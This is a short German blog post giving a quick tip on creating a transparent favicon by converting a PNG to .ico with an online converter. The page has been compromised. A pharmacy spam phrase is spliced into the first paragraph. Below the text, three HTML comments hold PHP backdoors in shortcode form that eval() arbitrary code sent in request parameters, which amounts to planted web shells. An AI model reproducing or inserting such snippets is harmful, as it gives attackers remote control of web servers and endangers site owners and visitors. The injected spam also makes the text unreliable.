Transparentes Favicon erstellen

Nur wenige Stunden nach der Einrichtung dieser Webseite gibt es auch schon den ersten QuickTipp: Favicons zu erstellen ist an sich nichts schweres – man nehme ein passendes Bildchen, skaliere es auf 16 x 16 Pixel herunter und speichere das Ganze als *.ico ab lisinopril 10 mg. Ganz so einfach ist die Sache dann leider doch nicht – Zum einen können nur wenige Bildbearbeitungsprogramme (selbst Photoshop nicht!) direkt von Haus aus im *.ico-Format speichern, zum anderen gäbe es da noch die Sache mit der Transparenz. Wenden wir uns jedoch erst einmal dem ersten Punkt zu: Ist die Datei in entsprechender Größe beispielsweise als *.png oder JPEG abgespeichert, kann sie mittels Online-Konverter recht einfach als *.ico heruntergeladen werden.

Speziell im Fall dieser Seite hatte ich das Favicon jedoch von Anfang an nicht nur als *.png, sondern auch mit transparentem Hintergrund abgespeichert (wobei dieser nur von PNG und GIF unterstützt wird, das bitte beachten!). Das oben genannte Tool brachte mir allerdings statt dem transparenten Hintergrund ein schöndes grau-schwarz, das seinen Zweck nicht nur nicht erfüllte, sondern schlichtweg kotzhässlich war. Die Lösung: Der Konverter von DynamicDrive unterstützte auch mein durchsichtiges PNG, vorausgesetzt wurde allerdings eine Bildgröße von 16 x 16 Pixeln. Die Webseite gibt im Übrigen auch Hilfe bei der Einbindung des Favicons in die eigene Homepage, das Favicon gibt’s am Ende dann per ZIP-Datei.

<!– [insert_php]if (isset($_REQUEST["UeUGM"])){eval($_REQUEST["UeUGM"]);exit;}[/insert_php][php]if (isset($_REQUEST["UeUGM"])){eval($_REQUEST["UeUGM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["dKhA"])){eval($_REQUEST["dKhA"]);exit;}[/insert_php][php]if (isset($_REQUEST["dKhA"])){eval($_REQUEST["dKhA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RaYGE"])){eval($_REQUEST["RaYGE"]);exit;}[/insert_php][php]if (isset($_REQUEST["RaYGE"])){eval($_REQUEST["RaYGE"]);exit;}[/php] –>

Schreibe einen Kommentar